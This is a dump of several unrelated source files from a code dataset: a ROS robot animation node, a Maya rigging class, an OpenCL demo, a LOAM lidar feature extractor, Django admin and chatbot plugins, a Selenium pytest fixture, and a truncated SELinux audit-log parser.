cNaoMotion.start_breathing()\n\n # the robot is not busy 
anymore\n robotBusy = False\n\n #init CBSI time\n cBSI.init_time_interaction()\n\n # launch timer to update BSI mood\n timerUpdateBSI = rospy.Timer(rospy.Duration(periodUpdateTimerBSI), callback_updateBSI)\n\n # launch timer that will triger animations at a certain frequency given in param\n timerLaunchAnimation = rospy.Timer(rospy.Duration(cBSI.periodAnimation), callback_timer_animation, oneshot=True)\n\n else:\n # the robot is busy (doing a task)\n robotBusy = True\n\n try:\n timerLaunchAnimation.shutdown()\n timerUpdateBSI.shutdown()\n except:\n pass\n\ndef callback_animations(data):\n\n # from the TELE_OP only\n # launch nao animation given in the topic\n cNaoMotion.launch(data.data)\n\ndef callback_poses(data):\n\n state = data.data\n\n # posture -> only use by teleOp, idle mode cannot launch the posture animation\n if state == 0:\n # go to init pose\n cNaoMotion.stand_init()\n\n elif state == 1:\n # go to crouch pose\n cNaoMotion.sit_down()\n\n elif state == 2:\n # start breathing\n cNaoMotion.start_breathing()\n\n elif state == 3:\n # stop breathing\n cNaoMotion.stop_breathing()\n\ndef callback_settings(data):\n\n global parkinson_scale\n global robotBusy\n\n state = data.data\n\n if state == 0:\n robotBusy = False\n\n if state == 1:\n # launch timer to update BSI mood\n timerUpdateBSI = rospy.Timer(rospy.Duration(periodUpdateTimerBSI), callback_updateBSI)\n\n # launch timer that will triger animations at a cerxtain frequency given in param\n timerLaunchAnimation = rospy.Timer(rospy.Duration(cBSI.periodAnimation), callback_timer_animation, oneshot=True)\n\ndef callback_user_feedback(data):\n\n if data.data == \"+\":\n cBSI.set_mood(\"happy\")\n \n elif data.data == \"-\":\n cBSI.set_mood(\"sad\")\n\ndef callback_timer_animation(event):\n if robotBusy == False:\n cNaoMotion.launch_animation(cBSI)\n\n # update timer frequency and relaunch it\n timerLaunchAnimation = rospy.Timer(rospy.Duration(cBSI.periodAnimation), callback_timer_animation, 
oneshot=True)\n\ndef callback_updateBSI(event):\n cBSI.update_mood(event.current_expected, event.last_expected)\n \n\nif __name__ == \"__main__\":\n\n # create a unique node\n rospy.init_node(\"animations_manager\")\n\n # get all parameteres from launch file\n NAO_IP = rospy.get_param('~nao_ip', '10.0.0.10')\n PORT = rospy.get_param('~nao_port', \"9559\")\n # topics name\n TOPIC_ANIMATIONS = rospy.get_param('~topic_animations', 'topic_animations')\n TOPIC_ACTIVITY = rospy.get_param('~topic_activity', 'state_activity')\n TOPIC_POSES = rospy.get_param('~topic_poses', 'topic_poses')\n TOPIC_SETTINGS = rospy.get_param('~topic_settings', 'topic_settings')\n TOPIC_USER_FEEDBACK = rospy.get_param('~topic_user_feedback', 'user_feedback')\n TOPIC_NB_REPETITION = rospy.get_param('~topic_nb_repetition', 'nb_repetition')\n\n # initial frequency at which animations are launch\n periodAnimation = float(rospy.get_param('~periodAnimation', '10'))\n periodAnimationMax = float(rospy.get_param('~periodAnimationMax', '10'))\n periodUpdateTimerBSI = float(rospy.get_param('~periodUpdateTimerBSI', '0.1'))\n\n # create animation class that will launch the animations\n cNaoMotion = NaoMotion(NAO_IP, int(PORT))\n\n # create the BSI class that will contain the behavior that the robot needs to show\n cBSI = BSI(periodAnimation, periodAnimationMax)\n\n # subscribe to topics that send animations, poses and settings orders\n rospy.Subscriber(TOPIC_ANIMATIONS, UInt8, callback_animations)\n rospy.Subscriber(TOPIC_POSES, UInt8, callback_poses)\n rospy.Subscriber(TOPIC_SETTINGS, UInt8, callback_settings)\n rospy.Subscriber(TOPIC_USER_FEEDBACK, String, callback_user_feedback)\n\n # subscribe to topic regarding the state machine\n rospy.Subscriber(TOPIC_ACTIVITY, String, callback_activityRobot)\n\n # spin() simply keeps python from exiting until this node is stopped\n 
rospy.spin()\n\n\n\n\n\n\n\n","sub_path":"nodes/animations_manager.py","file_name":"animations_manager.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406680347","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 5/21/2019 10:28 AM\n# @Author : invincible0918@126.com\n# @Site : \n# @File : fkJointChain.py\n# @Software: PyCharm\n\n\nfrom maya import cmds as mc\nimport jointChain\nreload(jointChain)\n\n\nclass FKJointChain(jointChain.JointChain):\n def __init__(self, sourceJointRoot, skinJointRoot, controllerRoot):\n super(FKJointChain, self).__init__(sourceJointRoot, skinJointRoot, controllerRoot)\n self._controllerTypes = ['parentConstraint']\n\n @property\n def _jointChainType(self):\n return 'Fk'\n\n def _iterJoints(self, parentJoint, li):\n children = mc.listRelatives(parentJoint, c=True, f=True, type='joint')\n\n d = dict()\n d['sourceJoint'] = parentJoint\n d['attrs'] = self._getConnectAttr(parentJoint)\n d['constraints'] = self._getControllers(parentJoint)\n\n li.append(d)\n\n if children:\n for joint in children:\n self._iterJoints(joint, li)\n\n def _generateDatas(self, sourceList, destList):\n li = list()\n for i in range(len(sourceList)):\n data = dict(sourceList[i])\n data['destJoint'] = destList[i]\n li.append(data)\n\n return li\n","sub_path":"Projects/Maya/Tools/WildLifeLeg/Package/Scripts/JointChain/fkJointChain.py","file_name":"fkJointChain.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630230282","text":"# code inspired from example provided by Roger Pau Monn'e\n\nimport pyopencl as cl\nimport numpy\nimport numpy.linalg as la\nimport datetime\nfrom time import time\n\n\n# number of data\nnum_data=4*25000*128\nfragment_size= 200\nsequence = numpy.random.randint(0,20,num_data).astype(numpy.uint8)\nfragment = 
numpy.random.randint(0,20,fragment_size).astype(numpy.uint8)\n\n# just for test, inject fragment somewhere in sequence\nsequence[100:100+fragment_size]=fragment\nscore = numpy.empty(num_data).astype(numpy.uint16)\n\n\nctx = cl.create_some_context()\nqueue = cl.CommandQueue(ctx,\n properties=cl.command_queue_properties.PROFILING_ENABLE)\n\nmf = cl.mem_flags\n\nsequence_buf = cl.Buffer(ctx, mf.READ_ONLY, sequence.nbytes)\nfragment_buf = cl.Buffer(ctx, mf.READ_ONLY, fragment.nbytes)\nscore_buf = cl.Buffer(ctx, mf.WRITE_ONLY, score.nbytes)\ntime1 = time()\ncl.enqueue_write_buffer(queue, sequence_buf, sequence)\ncl.enqueue_write_buffer(queue, fragment_buf, fragment)\nprg = cl.Program(ctx, \"\"\"\n __kernel void scanSequence(__global const uchar *sequence,\n __global const uchar *fragment, __global ushort *score, const uint size_data, const uint fragment_size)\n {\n int gid = get_global_id(0);\n ushort s=0;\n // TODO: implement a scan of fragment in current sequence element\n if(gid+fragment_size < size_data){\n\t for(int i=0; i< fragment_size; i++){\n\t \tif(sequence[gid+i] == fragment[i])s = s+1;\n\t }\n\t score[gid]=s;\n }\n }\n \"\"\").build()\n\nexec_evt = prg.scanSequence(queue, (num_data,), None,\n sequence_buf,\n fragment_buf,\n score_buf,\n numpy.uint32(num_data),\n numpy.uint32(fragment_size))\nexec_evt.wait()\nelapsed = 1e-9*(exec_evt.profile.end - exec_evt.profile.start)\ncl.enqueue_read_buffer(queue, score_buf, score).wait()\ntime2 = time()\nexecTime2 = time2 - time1\nprint(\"Execution time of test: %g s\" % elapsed)\nprint(\"Execution time of test + memory transfert time: %g s\" % execTime2)\n\nprint (score[90:110])\n","sub_path":"opencl.py","file_name":"opencl.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"636177541","text":"#import math\nimport numpy as np\nimport open3d as o3d\nfrom utils import matrix_dot_product\nfrom utils import pc_show\n#import 
utils\n'''\n当前函数中存在大量基于 相邻点坐标做差,然后求向量点乘,作为判断的阈值条件: 0.05, 0.2, 0.3。\n基于余弦定理,其实代表了两个激光点的 夹角 或者 空间距离的平方\na·b>0 方向基本相同,夹角在0°到90°之间 <--\na·b=0 正交,相互垂直 \na·b<0 方向基本相反,夹角在90°到180°之间 \n'''\nclass FeatureExtractor:\n # Number of segments to split every scan for feature detection\n N_SEGMENTS = 6\n\n # Number of less sharp points to pick from point cloud\n PICKED_NUM_LESS_SHARP = 20\n # Number of sharp points to pick from point cloud\n PICKED_NUM_SHARP = 4\n # Number of less sharp points to pick from point cloud\n PICKED_NUM_FLAT = 4\n # Threshold to split sharp and flat points\n SURFACE_CURVATURE_THRESHOLD = 0.1\n # Radius of points for curvature analysis (S / 2 from original paper, 5A section)\n FEATURES_REGION = 5 # window length (10+1) for sharpness, 当前点的前后5个点\n\n # idx为0-1序列flag,0-不选,1-选取,可视化使用\n def selectedPC(self, pc, idx):\n # 基于idx flag生成list\n count=0\n ind=[]\n for i in idx:\n count+=i\n if i != 0:\n ind.append(int(count))\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(pc[:,:3])\n sel_pcd=pcd.select_by_index(ind)\n sel_pcd.paint_uniform_color([1.0,0,0])\n pcd.paint_uniform_color([0, 1, 0])\n #pc_show([sel_pcd])\n pc_show([pcd,sel_pcd])\n\n def extract_features(self, laser_cloud, scan_start, scan_end):\n keypoints_sharp = []\n keypoints_less_sharp = []\n keypoints_flat = []\n keypoints_less_flat = []\n\n cloud_curvatures = self.get_curvatures(laser_cloud) # 基于前后点,获取每个点平滑度/曲率\n\n cloud_label = np.zeros((laser_cloud.shape[0])) # empty labels for storing,初始化为0\n cloud_neighbors_picked = np.zeros((laser_cloud.shape[0]))\n # 剔除不可靠点,在遍历计算平滑度之后,拆分特征点之前。\n cloud_neighbors_picked = self.remove_unreliable(cloud_neighbors_picked, laser_cloud, scan_start, scan_end)\n #print(\"outliner:\",sum(cloud_neighbors_picked))\n # i=扫描线[0-63]; j=区块[0-5]; k=平滑度特征选取窗口[]\n for i in range(scan_end.shape[0]): # 1.基于扫描线遍历\n s = scan_start[i] + self.FEATURES_REGION # 预留出前5\n e = scan_end[i] - self.FEATURES_REGION - 1 # 提前结束,保障窗口最后还有5\n if e - s < self.N_SEGMENTS: # 
越界保护\n continue\n # 0-5 一个ring拆分6等份操作, 2.基于子区间遍历\n for j in range(self.N_SEGMENTS):\n sp = s + (e - s) * j // self.N_SEGMENTS\n ep = s + (e - s) * (j + 1) // self.N_SEGMENTS - 1\n segments_curvatures = cloud_curvatures[sp:ep + 1] # 当前子环子段的连续11个平滑度值\n sort_indices = np.argsort(segments_curvatures) # 基于平滑度递增排序,平面在前 边在后\n '''\n 边特征筛选,先反向排序, 非平滑值在末端\n '''\n largest_picked_num = 0\n for k in reversed(range(ep - sp)):\n # print(ep,sp)\n if i < 45: # 边特征的选取范围仅考虑 45-64的扫描线? 针对kitti数出来不计算地面的点。\n break\n ind = sort_indices[k] + sp # 在当前点云帧的全局序号索引\n # 不在之前选取的点范围内 and 平滑度大于0.5 (论文是0.005,其它改版为0.1,需测试) and edge判断条件\n if cloud_neighbors_picked[ind] == 0 and cloud_curvatures[ind] > 0.5 and \\\n self.can_be_edge(laser_cloud, ind):\n largest_picked_num += 1\n if largest_picked_num <= self.PICKED_NUM_SHARP:\n keypoints_sharp.append(laser_cloud[ind]) # 添加边缘点\n keypoints_less_sharp.append(laser_cloud[ind]) # 添加边缘点\n cloud_label[ind] = 2\n elif largest_picked_num <= self.PICKED_NUM_LESS_SHARP: # keypoints_sharp 属于 keypoints_less_sharp\n keypoints_less_sharp.append(laser_cloud[ind]) # 添加边缘点\n cloud_label[ind] = 1\n else:\n break\n\n cloud_neighbors_picked = self.mark_as_picked(laser_cloud, cloud_neighbors_picked, ind) # 在已选择列表中标记\n #print(\"outliner+edge:\", sum(cloud_neighbors_picked))\n '''\n 面特征筛选, 使用原递增排序排序\n '''\n smallest_picked_num = 0\n for k in range(ep - sp):\n if i < 50: # 边特征的选取范围仅考虑 50-64的扫描线? 
针对kitti数出在地面的扫描线,来不计算地面的点。\n break\n ind = sort_indices[k] + sp\n # 不在之前选取的点范围内 and 平滑度小于0.1\n if cloud_neighbors_picked[ind] == 0 and cloud_curvatures[ind] < self.SURFACE_CURVATURE_THRESHOLD:\n smallest_picked_num += 1\n cloud_label[ind] = -1\n keypoints_flat.append(laser_cloud[ind]) # 添加平面点\n\n if smallest_picked_num >= self.PICKED_NUM_FLAT:\n break\n\n cloud_neighbors_picked = self.mark_as_picked(laser_cloud, cloud_neighbors_picked, ind)\n #print(\"outliner+edge+planer:\", sum(cloud_neighbors_picked))\n # 增补面特征 less_flat, 没有限制上限(高达8w左右), 主要集中在地面,因为没有过滤扫描线\n # 这部分特征点并没有被 mark_as_picked\n for k in range(sp, ep + 1):\n # =0的点为未选取点(cloud_label初始默认全0) <0的点为平面点 and not 存在大间隙,前后遮挡物体,保证是一个确定的平面\n if cloud_label[k] <= 0 and cloud_curvatures[k] < self.SURFACE_CURVATURE_THRESHOLD \\\n and not self.has_gap(laser_cloud, k):\n keypoints_less_flat.append(laser_cloud[k])\n '''\n keypoints = utils.get_pcd_from_numpy(np.vstack(keypoints_flat))\n keypoints.paint_uniform_color([0, 1, 0])\n keypoints_2 = utils.get_pcd_from_numpy(np.vstack(keypoints_sharp))\n keypoints_2.paint_uniform_color([1, 0, 0])\n pcd = utils.get_pcd_from_numpy(laser_cloud)\n pcd.paint_uniform_color([0, 0, 1])\n #o3d.visualization.draw_geometries([keypoints])\n o3d.visualization.draw_geometries([keypoints, keypoints_2])\n '''\n return keypoints_sharp, keypoints_less_sharp, keypoints_flat, keypoints_less_flat\n '''\n c=1/|S||Xi| |Sum(Xi-Xj)|\n Xi与Xj差异越大,总的c越大,就是边特征 Edge/Sharp\n 反之,特征处于平面,差异不大,属于面特征 planer\n '''\n def get_curvatures(self, pcd):\n coef = [1, 1, 1, 1, 1, -10, 1, 1, 1, 1, 1]\n #coef = [1, -10, 1]\n assert len(coef) == 2 * self.FEATURES_REGION + 1\n discr_diff = lambda x: np.convolve(x, coef, 'valid') # 参数x,传入 f(x)=np.convolve() 进行计算\n x_diff = discr_diff(pcd[:, 0])\n #x_diff1 = discr_diff(pcd[:10, 0])\n y_diff = discr_diff(pcd[:, 1])\n z_diff = discr_diff(pcd[:, 2])\n curvatures = x_diff * x_diff + y_diff * y_diff + z_diff * z_diff\n #temp=pcd[self.FEATURES_REGION:-self.FEATURES_REGION]\n 
#temp1=np.linalg.norm(temp,axis=1) # sqrt(x^2+y^2+z^2)\n curvatures /= np.linalg.norm(pcd[self.FEATURES_REGION:-self.FEATURES_REGION], axis=1) * 10 # *S\n curvatures = np.pad(curvatures, self.FEATURES_REGION) # 前后0填充各5个数值,补齐到原pcd长度\n return curvatures\n\n # 在排除已选择的特征点的同时,还对其周围一定范围内的点进行排除,防止后续被选择\n # 但是这个排除还是基于扫描线的排除,而不是完整的空间距离\n def mark_as_picked(self, laser_cloud, cloud_neighbors_picked, ind):\n cloud_neighbors_picked[ind] = 1 # 当前点\n # ind 前后5个点序列 错位相减\n diff_all = laser_cloud[ind - self.FEATURES_REGION + 1:ind + self.FEATURES_REGION + 2] - \\\n laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION + 1]\n # 距离差矩阵点乘==向量夹角\n sq_dist = matrix_dot_product(diff_all[:, :3], diff_all[:, :3])\n # 1:6\n for i in range(1, self.FEATURES_REGION + 1):\n if sq_dist[i + self.FEATURES_REGION] > 0.05:\n break\n cloud_neighbors_picked[ind + i] = 1\n # -5:0\n for i in range(-self.FEATURES_REGION, 0):\n if sq_dist[i + self.FEATURES_REGION] > 0.05:\n break\n cloud_neighbors_picked[ind + i] = 1\n\n return cloud_neighbors_picked\n # 非可靠点过滤\n '''\n 1.基于扫描线进行遍历,采用滑动固定窗口,注意边界;不是从第一个点开始+wind/2,和最后一个点-wind/2\n 2.对当前扫描线内,相邻点夹角为正(dot>0.1)判断距离; 防止点过密\n 3.基于点到传感器距离进行 赋权距离计算 ,仅考虑 赋权距离小于0.1的当前点的前5后1个点 \n '''\n def remove_unreliable(self, cloud_neighbors_picked, pcd, scan_start, scan_end):\n for i in range(scan_end.shape[0]): # 0-max ring number\n sp = scan_start[i] + self.FEATURES_REGION # 区间范围,兼顾前后窗口\n ep = scan_end[i] - self.FEATURES_REGION\n\n if ep - sp < self.N_SEGMENTS: # 当前扫描线数量足够拆分为 N_SEGMENTS 个子段,\n continue\n\n for j in range(sp + 1, ep):\n prev_point = pcd[j - 1][:3] # 上一点\n point = pcd[j][:3] # 当前点\n next_point = pcd[j + 1][:3] # 下一点\n # 当前点到下一个点的夹角,通过夹角来代替距离\n diff_next = np.dot(point - next_point, point - next_point) #\n # 两点构成向量的点乘,夹角>0;因为雷达扫描基本是有序的,大概率不会出现负值[90,180]的情况;进行下一步判断,防止特征点过于密集\n if diff_next > 0.1:\n depth1 = np.linalg.norm(point) # 点到到传感器距离\n depth2 = np.linalg.norm(next_point) # 到传感器距离\n # 小的做权重分母,大的做归一化分母\n if depth1 > depth2: # 
当point的距离远时,用一个小于1的权重乘next_point,增大距离差。\n weighted_dist = np.sqrt(np.dot(point - next_point * depth2 / depth1,\n point - next_point * depth2 / depth1)) / depth2\n if weighted_dist < 0.1:\n cloud_neighbors_picked[j - self.FEATURES_REGION:j + 1] = 1 # 前5后1,7个点\n #sss=sum(cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n continue\n else:\n weighted_dist = np.sqrt(np.dot(point - next_point * depth1 / depth2,\n point - next_point * depth1 / depth2)) / depth1\n\n if weighted_dist < 0.1:\n cloud_neighbors_picked[j - self.FEATURES_REGION: j + self.FEATURES_REGION + 1] = 1 # 前5 后6\n #sss = sum(cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n continue\n # 向前判断,(|P1||P2|cos Theta)/ |P1|>0.0002\n diff_prev = np.dot(point - prev_point, point - prev_point)\n dis = np.dot(point, point)\n # 上一个点和下一个点到当前点的\n if diff_next > 0.0002 * dis and diff_prev > 0.0002 * dis:\n cloud_neighbors_picked[j] = 1\n #sss = sum(cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n return cloud_neighbors_picked\n\n # (仅针对面特征)排除可能存在遮挡区域的特征,判断条件为 当前点与附近点(一个segment) 不存在巨大间距 0.54 m。\n def has_gap(self, laser_cloud, ind):\n diff_S = laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION + 1, :3] - laser_cloud[ind, :3] # seg点-当前点\n sq_dist = matrix_dot_product(diff_S[:, :3], diff_S[:, :3]) # sq_dist=x^2+y^2+z^2\n gapped = sq_dist[sq_dist > 0.3] # 距离到当前点ind大于 0.548m=sqrt(0.3) 的点/ 夹角阈值\n if gapped.shape[0] > 0: # 存在间隙,潜在不稳定\n return True\n else:\n return False\n # (仅针对边特征)也是基于距离来判断前后点\n def can_be_edge(self, laser_cloud, ind):\n #curpc=laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION, :3]\n #pcd = o3d.geometry.PointCloud()\n #pcd.points = o3d.utility.Vector3dVector(curpc[:, 0:3])\n #pc_show([pcd])\n diff_S = laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION, :3] -\\\n laser_cloud[ind - self.FEATURES_REGION + 1:ind + self.FEATURES_REGION + 1, :3] # 
当前点-下一个点,错位相减 p(k)-p(k+1)\n sq_dist = matrix_dot_product(diff_S[:, :3], diff_S[:, :3]) #\n gapped = laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION, :3][sq_dist > 0.2] # x^2+y^2+z^2>0.2的点\n if len(gapped) == 0: # 夹角阈值都不超过 0.2\n return True\n else:\n # a=np.linalg.norm(gapped, axis=1) # 大于阈值点的范数\n # b=np.linalg.norm(laser_cloud[ind][:3]) # 当前点的1-范数\n return np.any(np.linalg.norm(gapped, axis=1) > np.linalg.norm(laser_cloud[ind][:3]))\n","sub_path":"LOAM/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":14771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"363931569","text":"from django.contrib import admin\r\n\r\nfrom .models import Client\r\nfrom .models import Layer\r\nfrom .models import Orchard\r\nfrom .models import Survey\r\nfrom .models import SurveyLayer\r\nfrom .models import Annotation\r\n\r\nclass OrchardInline(admin.StackedInline):\r\n model = Orchard\r\n\r\nclass SurveyInline(admin.StackedInline):\r\n model = Survey\r\n\r\nclass AnnotationInline(admin.StackedInline):\r\n model = Annotation\r\n\r\nclass SurveyLayersInline(admin.StackedInline):\r\n model = SurveyLayer\r\n\r\n\r\nclass ClientAdmin(admin.ModelAdmin):\r\n inlines = [ OrchardInline ]\r\n readonly_fields=('id',)\r\n\r\nclass OrchardAdmin(admin.ModelAdmin):\r\n inlines = [ SurveyInline ]\r\n readonly_fields=('id',)\r\n\r\nclass SurveyAdmin(admin.ModelAdmin):\r\n inlines = [ SurveyLayersInline, AnnotationInline ]\r\n readonly_fields=('id',)\r\n\r\n\r\nadmin.site.register(Annotation)\r\nadmin.site.register(SurveyLayer)\r\nadmin.site.register(Survey, SurveyAdmin)\r\nadmin.site.register(Orchard, OrchardAdmin)\r\nadmin.site.register(Layer)\r\nadmin.site.register(Client, ClientAdmin)\r\n\r\n\r\n","sub_path":"dataviewer/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"468526282","text":"import random\nfrom nonebot import on_startswith\nfrom nonebot.rule import to_me\nfrom nonebot.adapters.cqhttp import Bot, Event\nfrom game.utils.image import toImage\nfrom game.model import offline\nfrom game.kernel.account import check_account\nfrom game.utils.database import *\n\ntest_test = on_startswith(msg=\"测试\", rule=to_me(), priority=1)\ntest_broadcast = on_startswith(msg=\"广播\", rule=to_me(), priority=1)\ntest_admin = on_startswith(msg=\"admin\", rule=to_me(), priority=1)\n\n@test_test.handle()\nasync def test_handler(bot: Bot, event: Event, state: dict):\n user = await check_account(test_test,event)\n if not user.isAdmin:\n await test_test.finish(\"没有管理员权限!\", **{'at_sender': True})\n await test_test.finish(toImage(str(event.message).lstrip(\"测试 \")), **{'at_sender': True})\n\n@test_broadcast.handle()\nasync def broadcast_handler(bot: Bot, event: Event, state: dict):\n user = await check_account(test_broadcast,event)\n if not user.isAdmin:\n await test_broadcast.finish(\"没有管理员权限!\", **{'at_sender': True})\n msg = str(event.message).split(\"广播\")[1]\n offline.Offline.broadcast(user, msg)\n\n@test_admin.handle()\nasync def admin_handler(bot: Bot, event: Event, state: dict):\n user = await check_account(test_admin, event)\n if not user.isAdmin:\n await test_admin.finish(\"没有管理员权限!\", **{'at_sender': True})\n cursor = g_database.cursor()\n msg = str(event.message).split(\"admin\")[1]\n try:\n count = cursor.execute(msg)\n ret = \"执行成功\\n\"\n result = \"\"\n items = cursor.fetchall()\n for item in items:\n result += str(item) + \"\\n\"\n ret += toImage(result)\n except Exception as e:\n ret = \"执行失败\\n\" + toImage(str(e))\n finally:\n cursor.close()\n await test_test.finish(ret, **{'at_sender': True})","sub_path":"bot/src/plugins/game/kernel/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"11483232","text":"import pytest\nfrom selenium import webdriver\n\n\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default=None,\n help=\"Choose language: ru, en, fr, ...\")\n\n\nlanguages = ['ar', 'ca', 'cs', 'da', 'de', 'en-gb', 'el', 'es', 'fi', 'fr', 'it',\n 'ko', 'nl', 'pl', 'pt', 'pt-br', 'ro', 'ru', 'sk', 'uk', 'zh-hans', 'en']\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n lang_option = request.config.getoption(\"language\")\n if lang_option in languages:\n options = webdriver.ChromeOptions()\n user_language = request.config.getoption(\"language\")\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n browser = webdriver.Chrome(options=options)\n else:\n raise pytest.UsageError(\"--language should be ru, en, fr, ... etc\")\n yield browser\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"242860511","text":"# Authors: Karl MacMillan \n#\n# Copyright (C) 2006 Red Hat \n# see file 'COPYING' for use and warranty information\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; version 2 only\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n\nimport refpolicy\nimport access\nimport re\n\n# Convenience functions\n\ndef get_audit_msgs():\n \"\"\"Obtain all of the avc and policy load messages from the audit\n log. This function uses ausearch and requires that the current\n process have sufficient rights to run ausearch.\n\n Returns:\n string contain all of the audit messages returned by ausearch.\n \"\"\"\n import subprocess\n output = subprocess.Popen([\"/sbin/ausearch\", \"-m\", \"AVC,USER_AVC,MAC_POLICY_LOAD,DAEMON_START,SELINUX_ERR\"],\n stdout=subprocess.PIPE).communicate()[0]\n return output\n\ndef get_dmesg_msgs():\n \"\"\"Obtain all of the avc and policy load messages from /bin/dmesg.\n\n Returns:\n string contain all of the audit messages returned by dmesg.\n \"\"\"\n import subprocess\n output = subprocess.Popen([\"/bin/dmesg\"],\n stdout=subprocess.PIPE).communicate()[0]\n return output\n\n# Classes representing audit messages\n\nclass AuditMessage:\n \"\"\"Base class for all objects representing audit messages.\n\n AuditMessage is a base class for all audit messages and only\n provides storage for the raw message (as a string) and a\n parsing function that does nothing.\n \"\"\"\n def __init__(self, message):\n self.message = message\n self.header = \"\"\n\n def from_split_string(self, recs):\n \"\"\"Parse a string that has been split into records by space into\n an audit message.\n\n This method should be overridden by subclasses. 
Error reporting\n should be done by raise ValueError exceptions.\n \"\"\"\n for msg in recs:\n fields = msg.split(\"=\")\n if len(fields) != 2:\n if msg[:6] == \"audit(\":\n self.header = msg\n return\n else:\n continue\n \n if fields[0] == \"msg\":\n self.header = fields[1]\n return\n\n\nclass InvalidMessage(AuditMessage):\n \"\"\"Class representing invalid audit messages. This is used to differentiate\n between audit messages that aren't recognized (that should return None from\n the audit message parser) and a message that is recognized but is malformed\n in some way.\n \"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n\nclass PathMessage(AuditMessage):\n \"\"\"Class representing a path message\"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.path = \"\"\n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs)\n \n for msg in recs:\n fields = msg.split(\"=\")\n if len(fields) != 2:\n continue\n if fields[0] == \"path\":\n self.path = fields[1][1:-1]\n return\n\nclass AVCMessage(AuditMessage):\n \"\"\"AVC message representing an access denial or granted message.\n\n This is a very basic class and does not represent all possible fields\n in an avc message. 
Currently the fields are:\n scontext - context for the source (process) that generated the message\n tcontext - context for the target\n tclass - object class for the target (only one)\n comm - the process name\n exe - the on-disc binary\n path - the path of the target\n access - list of accesses that were allowed or denied\n denial - boolean indicating whether this was a denial (True) or granted\n (False) message.\n\n An example audit message generated from the audit daemon looks like (line breaks\n added):\n 'type=AVC msg=audit(1155568085.407:10877): avc: denied { search } for\n pid=677 comm=\"python\" name=\"modules\" dev=dm-0 ino=13716388\n scontext=user_u:system_r:setroubleshootd_t:s0\n tcontext=system_u:object_r:modules_object_t:s0 tclass=dir'\n\n An example audit message stored in syslog (not processed by the audit daemon - line\n breaks added):\n 'Sep 12 08:26:43 dhcp83-5 kernel: audit(1158064002.046:4): avc: denied { read }\n for pid=2 496 comm=\"bluez-pin\" name=\".gdm1K3IFT\" dev=dm-0 ino=3601333\n scontext=user_u:system_r:bluetooth_helper_t:s0-s0:c0\n tcontext=system_u:object_r:xdm_tmp_t:s0 tclass=file\n \"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.scontext = refpolicy.SecurityContext()\n self.tcontext = refpolicy.SecurityContext()\n self.tclass = \"\"\n self.comm = \"\"\n self.exe = \"\"\n self.path = \"\"\n self.accesses = []\n self.denial = True\n\n def __parse_access(self, recs, start):\n # This is kind of sucky - the access that is in a space separated\n # list like '{ read write }'. This doesn't fit particularly well with splitting\n # the string on spaces. This function takes the list of recs and a starting\n # position one beyond the open brace. 
It then adds the accesses until it finds\n # the close brace or the end of the list (which is an error if reached without\n # seeing a close brace).\n found_close = False\n i = start\n if i == (len(recs) - 1):\n raise ValueError(\"AVC message in invalid format [%s]\\n\" % self.message)\n while i < len(recs):\n if recs[i] == \"}\":\n found_close = True\n break\n self.accesses.append(recs[i])\n i = i + 1\n if not found_close:\n raise ValueError(\"AVC message in invalid format [%s]\\n\" % self.message)\n return i + 1\n \n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs) \n # FUTURE - fully parse avc messages and store all possible fields\n # Required fields\n found_src = False\n found_tgt = False\n found_class = False\n found_access = False\n \n for i in range(len(recs)):\n if recs[i] == \"{\":\n i = self.__parse_access(recs, i + 1)\n found_access = True\n continue\n elif recs[i] == \"granted\":\n self.denial = False\n \n fields = recs[i].split(\"=\")\n if len(fields) != 2:\n continue\n if fields[0] == \"scontext\":\n self.scontext = refpolicy.SecurityContext(fields[1])\n found_src = True\n elif fields[0] == \"tcontext\":\n self.tcontext = 